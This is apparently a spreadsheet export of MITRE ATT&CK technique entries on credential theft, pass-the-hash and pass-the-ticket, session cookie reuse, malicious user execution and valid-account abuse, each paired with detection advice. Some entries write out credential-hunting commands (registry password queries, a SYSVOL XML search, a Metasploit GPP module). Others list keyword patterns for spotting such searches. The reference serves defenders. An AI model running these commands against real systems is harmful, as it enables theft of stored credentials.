    <t>Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)
Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)
Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
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
Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>Unsecured Credentials: Bash History</t>
  </si>
  <si>
    <t>Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>07 February 2020</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>T1552.005</t>
  </si>
  <si>
    <t>Unsecured Credentials: Cloud Instance Metadata API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Unsecured Credentials: Container API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Jay Chen, Palo Alto Networks; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials In Files</t>
  </si>
  <si>
    <t>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>Jay Chen, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Rory McCune, Aqua Security; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials in Registry</t>
  </si>
  <si>
    <t>Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;
* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.006</t>
  </si>
  <si>
    <t>Unsecured Credentials: Group Policy Preferences</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: &lt;code&gt;post/windows/gather/credentials/gpp&lt;/code&gt;
* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: &lt;code&gt;dir /s * .xml&lt;/code&gt;
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>T1552.004</t>
  </si>
  <si>
    <t>Unsecured Credentials: Private Keys</t>
  </si>
  <si>
    <t>Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:&amp;#92;Users&amp;#92;(username)&amp;#92;.ssh&amp;#92;&lt;/code&gt; on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>Defense Evasion, Lateral Movement</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Application Access Token</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/001</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Hash</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.
When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/002</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.
Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1550.003</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Ticket</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/003</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Ryan Becwar; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Web Session Cookie</t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Johann Rehberger</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</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</si>
  <si>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[Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, File: File Creation, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Oleg Skulkin, Group-IB</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>User Execution: Malicious File</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.
While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1204.003</t>
  </si>
  <si>
    <t>User Execution: Malicious Image</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>User Execution: Malicious Link</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/001</t>
  </si>
  <si>
    <t>Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>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and remote desktop.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
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Mark Wee; Netskope; Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Firewall, Host intrusion prevention systems, Network intrusion detection system, System access controls</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Valid Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Valid Accounts: Default Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>05 April 2021</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1078/002</t>
  </si>
  <si>
